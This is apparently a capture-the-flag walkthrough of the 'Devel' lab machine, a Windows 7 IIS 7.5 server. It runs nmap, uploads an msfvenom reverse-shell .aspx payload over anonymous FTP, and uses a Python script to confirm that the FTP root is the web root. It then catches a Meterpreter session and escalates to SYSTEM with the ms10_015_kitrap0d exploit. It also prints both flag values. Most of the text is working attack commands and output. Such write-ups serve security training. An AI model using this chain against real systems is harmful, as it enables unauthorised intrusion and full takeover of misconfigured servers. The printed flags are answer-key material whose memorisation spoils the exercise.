FTP and HTTP are exposed. Anonymous FTP login is allowed, and the listing (aspnet_client, iisstart.htm, welcome.png) is the default content of an IIS 7.x document root.
```
# nmap -A -n -F -T5 devel.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 07:44 UTC
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.044s latency).
Not shown: 98 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
```
Logging in over FTP confirms that the anonymous FTP root is the web document root, and that it is writable.
So the plan is to upload an .aspx file that spawns a reverse shell, then request it over HTTP so IIS compiles and executes it.
```
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx > reverse.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2788 bytes

# ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,10).
125 Data connection already open; Transfer starting.
226 Transfer complete.
2824 bytes sent in 0.00 secs (5.7918 MB/s)
```
The handler receives the reverse shell once reverse.aspx is requested, but it runs as the application pool identity (IIS APPPOOL\Web), which cannot enter the user's folder under C:\Users.
```
# msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:37972) at 2020-08-10 14:42:31 +0000
meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > shell
Process 3828 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

c:\windows\system32\inetsrv>cd c:\Users
cd c:\Users

c:\Users>cd babis
cd babis
Access is denied.
```
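Before dropping reverse.aspx it is worth confirming, rather than assuming, that the anonymous FTP root really is the IIS document root and that the web server serves what FTP writes. The following is an added example (not part of the original writeup or of any Metasploit tooling): it parses the DOS-style listing that Microsoft ftpd returns, flags the IIS default content seen in the nmap output above, and then uploads a random marker file over anonymous FTP, fetches it back over HTTP and deletes it. The host name, ports and the marker naming scheme are assumptions for illustration; the sample listing is constructed from the nmap output on this page.

```python
"""Check that an anonymous-writable FTP root is the IIS web root.

Added example, not code from the original writeup. Host/port values and the
"probe_<hex>.txt" marker scheme are assumptions for illustration.
"""
import ftplib
import io
import re
import secrets
import sys
import urllib.error
import urllib.request

# Default IIS 7.x content; all three appeared in the ftp-anon listing.
IIS_DEFAULT_FILES = {"aspnet_client", "iisstart.htm", "welcome.png"}

# Constructed sample: the ftp-anon lines exactly as nmap printed them.
SAMPLE_LISTING = """\
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png"""

# Microsoft ftpd LIST line: "MM-DD-YY HH:MMAM <DIR>|size name"
_DOS_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)


def parse_dos_listing(text):
    """Return [(name, is_dir, size)] for each DOS-style line.

    Leading "| " / "|_" nmap script prefixes are tolerated so the function
    works on both raw LIST output and pasted nmap output.
    """
    entries = []
    for line in text.splitlines():
        m = _DOS_LINE.match(line.strip().lstrip("|_ "))
        if not m:
            continue
        is_dir = m.group("dir") is not None
        size = 0 if is_dir else int(m.group("size"))
        entries.append((m.group("name"), is_dir, size))
    return entries


def looks_like_iis_wwwroot(entries):
    """True when every IIS default file/dir is present in the listing."""
    return IIS_DEFAULT_FILES <= {name for name, _, _ in entries}


def new_marker():
    """Random marker name and body, so it neither collides with nor leaks
    anything about real content in the web root."""
    token = secrets.token_hex(8)
    return f"probe_{token}.txt", token.encode()


def marker_matches(fetched, expected):
    """IIS serves .txt verbatim; tolerate a trailing newline only."""
    return fetched is not None and fetched.strip() == expected


def ftp_root_is_web_root(host, ftp_port=21, http_port=80, timeout=10):
    """Upload a marker anonymously, fetch it over HTTP, delete it.

    Returns (served_back, listing_entries). served_back is True only when
    the exact bytes written over FTP come back over HTTP, which is the
    precondition for the reverse.aspx upload to be executed by IIS.
    """
    name, body = new_marker()
    ftp = ftplib.FTP()
    ftp.connect(host, ftp_port, timeout=timeout)
    ftp.login()  # anonymous, as the nmap ftp-anon script reported
    ftp.set_pasv(True)
    lines = []
    ftp.retrlines("LIST", lines.append)
    entries = parse_dos_listing("\n".join(lines))
    ftp.storbinary(f"STOR {name}", io.BytesIO(body))
    fetched = None
    try:
        url = f"http://{host}:{http_port}/{name}"
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                fetched = resp.read()
        except urllib.error.URLError:
            fetched = None  # not served: different root, or no static handler
    finally:
        try:
            ftp.delete(name)  # clean up the marker
        except ftplib.error_perm:
            pass  # write-only drop box: leave cleanup to the operator
        ftp.quit()
    return marker_matches(fetched, body), entries


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "devel.htb"  # assumed host
    ok, listing = ftp_root_is_web_root(target)
    print("IIS default content in FTP root:", looks_like_iis_wwwroot(listing))
    print("FTP upload served back over HTTP:", ok)
```

Only when the second line prints True does an uploaded .aspx stand a chance of being executed; the listing check alone is circumstantial, since an administrator can leave the default files in place while pointing FTP at a different directory.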
Use local_exploit_suggester to look for a local privilege escalation. The target reports Windows 6.1.7600, i.e. Windows 7 RTM with no service pack, so a long list of kernel exploits comes back. Note the two result wordings: "appears to be vulnerable" versus "could not be validated"; the latter only means the check could not confirm the patch state, not that the exploit will fail.
```
meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 34 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
```
Escalate with ms10_015_kitrap0d. Although the suggester could not validate it, the exploit runs cleanly: it injects into a fresh notepad.exe and returns a second Meterpreter session as NT AUTHORITY\SYSTEM. The handler cannot bind to 10.10.14.13:4444 here and falls back to 0.0.0.0, which is why the session shows the 172.17.0.x addresses; the flags in the user's and Administrator's Desktop folders are readable once SYSTEM. Both flags are stored as *.txt.txt on this box, so the first "root.txt" attempt fails.
```
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
[-] Handler failed to bind to 10.10.14.13:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 4020 launched.
[*] Reflectively injecting the exploit DLL into 4020...
[*] Injecting exploit into 4020 ...
[*] Exploit injected. Injecting payload into 4020...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:42604) at 2020-08-10 15:19:11 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 596 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>cd c:\Users
cd c:\Users

c:\Users>type babis\Desktop\user.txt.txt
type babis\Desktop\user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

c:\Users>type administrator\Desktop\root.txt
type administrator\Desktop\root.txt
The system cannot find the file specified.

c:\Users>type administrator\Desktop\root.txt.txt
type administrator\Desktop\root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
```